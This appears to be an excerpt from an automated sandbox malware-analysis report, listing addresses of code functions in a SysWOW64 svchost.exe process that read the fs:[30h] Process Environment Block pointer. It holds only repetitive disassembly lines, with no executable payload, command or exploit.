Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03000124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03064144 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03064144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03064144 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC80A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03068158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A4164 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0308C188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03010185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03074180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFC073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD2050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030961C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E1D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E1D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCA020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCC020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEE016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A61E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030001F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03054000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03066030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03056050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCA197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD6154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCC156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030680A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030960B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030960B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030520DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030560E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030120F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03000710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304C730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300674D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300674D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03054755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03012750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305E75D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD4690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030847A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEC640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030507C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD262C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEE627 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305E7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE260B mov eax, dword ptr fs:[00000030h]1_2_02FE260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD47FB mov eax, dword ptr fs:[00000030h]1_2_02FD47FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD47FB mov eax, dword ptr fs:[00000030h]1_2_02FD47FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E609 mov eax, dword ptr fs:[00000030h]1_2_0304E609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF27ED mov eax, dword ptr fs:[00000030h]1_2_02FF27ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF27ED mov eax, dword ptr fs:[00000030h]1_2_02FF27ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF27ED mov eax, dword ptr fs:[00000030h]1_2_02FF27ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012619 mov eax, dword ptr fs:[00000030h]1_2_03012619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03006620 mov eax, dword ptr fs:[00000030h]1_2_03006620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008620 mov eax, dword ptr fs:[00000030h]1_2_03008620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDC7C0 mov eax, dword ptr fs:[00000030h]1_2_02FDC7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD07AF mov eax, dword ptr fs:[00000030h]1_2_02FD07AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A660 mov eax, dword ptr fs:[00000030h]1_2_0300A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A660 mov eax, dword ptr fs:[00000030h]1_2_0300A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309866E mov eax, dword ptr fs:[00000030h]1_2_0309866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309866E mov eax, dword ptr fs:[00000030h]1_2_0309866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002674 mov eax, dword ptr fs:[00000030h]1_2_03002674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8770 mov eax, dword ptr fs:[00000030h]1_2_02FD8770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0770 mov eax, dword ptr fs:[00000030h]1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C6A6 mov eax, dword ptr fs:[00000030h]1_2_0300C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0750 mov eax, dword ptr fs:[00000030h]1_2_02FD0750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030066B0 mov eax, dword ptr fs:[00000030h]1_2_030066B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0300A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A6C7 mov eax, dword ptr fs:[00000030h]1_2_0300A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0710 mov eax, dword ptr fs:[00000030h]1_2_02FD0710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030506F1 mov eax, dword ptr fs:[00000030h]1_2_030506F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030506F1 mov eax, dword ptr fs:[00000030h]1_2_030506F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E6F2 mov eax, dword ptr fs:[00000030h]1_2_0304E6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E6F2 mov eax, dword ptr fs:[00000030h]1_2_0304E6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E6F2 mov eax, dword ptr fs:[00000030h]1_2_0304E6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E6F2 mov eax, dword ptr fs:[00000030h]1_2_0304E6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066500 mov eax, dword ptr fs:[00000030h]1_2_03066500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4500 mov eax, dword ptr fs:[00000030h]1_2_030A4500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD04E5 mov ecx, dword ptr fs:[00000030h]1_2_02FD04E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD64AB mov eax, dword ptr fs:[00000030h]1_2_02FD64AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300656A mov eax, dword ptr fs:[00000030h]1_2_0300656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300656A mov eax, dword ptr fs:[00000030h]1_2_0300656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300656A mov eax, dword ptr fs:[00000030h]1_2_0300656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004588 mov eax, dword ptr fs:[00000030h]1_2_03004588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA470 mov eax, dword ptr fs:[00000030h]1_2_02FFA470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA470 mov eax, dword ptr fs:[00000030h]1_2_02FFA470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA470 mov eax, dword ptr fs:[00000030h]1_2_02FFA470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E59C mov eax, dword ptr fs:[00000030h]1_2_0300E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC645D mov eax, dword ptr fs:[00000030h]1_2_02FC645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030505A7 mov eax, dword ptr fs:[00000030h]1_2_030505A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030505A7 mov eax, dword ptr fs:[00000030h]1_2_030505A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030505A7 mov eax, dword ptr fs:[00000030h]1_2_030505A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF245A mov eax, dword ptr fs:[00000030h]1_2_02FF245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E5CF mov eax, dword ptr fs:[00000030h]1_2_0300E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E5CF mov eax, dword ptr fs:[00000030h]1_2_0300E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A5D0 mov eax, dword ptr fs:[00000030h]1_2_0300A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A5D0 mov eax, dword ptr fs:[00000030h]1_2_0300A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCC427 mov eax, dword ptr fs:[00000030h]1_2_02FCC427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE420 mov eax, dword ptr fs:[00000030h]1_2_02FCE420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE420 mov eax, dword ptr fs:[00000030h]1_2_02FCE420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCE420 mov eax, dword ptr fs:[00000030h]1_2_02FCE420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C5ED mov eax, dword ptr fs:[00000030h]1_2_0300C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C5ED mov eax, dword ptr fs:[00000030h]1_2_0300C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008402 mov eax, dword ptr fs:[00000030h]1_2_03008402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008402 mov eax, dword ptr fs:[00000030h]1_2_03008402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008402 mov eax, dword ptr fs:[00000030h]1_2_03008402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD25E0 mov eax, dword ptr fs:[00000030h]1_2_02FD25E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD65D0 mov eax, dword ptr fs:[00000030h]1_2_02FD65D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF45B1 mov eax, dword ptr fs:[00000030h]1_2_02FF45B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF45B1 mov eax, dword ptr fs:[00000030h]1_2_02FF45B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308A456 mov eax, dword ptr fs:[00000030h]1_2_0308A456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C460 mov ecx, dword ptr fs:[00000030h]1_2_0305C460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2582 mov eax, dword ptr fs:[00000030h]1_2_02FD2582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2582 mov ecx, dword ptr fs:[00000030h]1_2_02FD2582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308A49A mov eax, dword ptr fs:[00000030h]1_2_0308A49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8550 mov eax, dword ptr fs:[00000030h]1_2_02FD8550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8550 mov eax, dword ptr fs:[00000030h]1_2_02FD8550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030044B0 mov ecx, dword ptr fs:[00000030h]1_2_030044B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A4B0 mov eax, dword ptr fs:[00000030h]1_2_0305A4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4B00 mov eax, dword ptr fs:[00000030h]1_2_030A4B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03098B28 mov eax, dword ptr fs:[00000030h]1_2_03098B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03098B28 mov eax, dword ptr fs:[00000030h]1_2_03098B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0AD0 mov eax, dword ptr fs:[00000030h]1_2_02FD0AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03084B4B mov eax, dword ptr fs:[00000030h]1_2_03084B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03084B4B mov eax, dword ptr fs:[00000030h]1_2_03084B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03078B42 mov eax, dword ptr fs:[00000030h]1_2_03078B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066B40 mov eax, dword ptr fs:[00000030h]1_2_03066B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066B40 mov eax, dword ptr fs:[00000030h]1_2_03066B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309AB40 mov eax, dword ptr fs:[00000030h]1_2_0309AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307EB50 mov eax, dword ptr fs:[00000030h]1_2_0307EB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8AA0 mov eax, dword ptr fs:[00000030h]1_2_02FD8AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8AA0 mov eax, dword ptr fs:[00000030h]1_2_02FD8AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A2B57 mov eax, dword ptr fs:[00000030h]1_2_030A2B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A2B57 mov eax, dword ptr fs:[00000030h]1_2_030A2B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A2B57 mov eax, dword ptr fs:[00000030h]1_2_030A2B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A2B57 mov eax, dword ptr fs:[00000030h]1_2_030A2B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0A5B mov eax, dword ptr fs:[00000030h]1_2_02FE0A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0A5B mov eax, dword ptr fs:[00000030h]1_2_02FE0A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
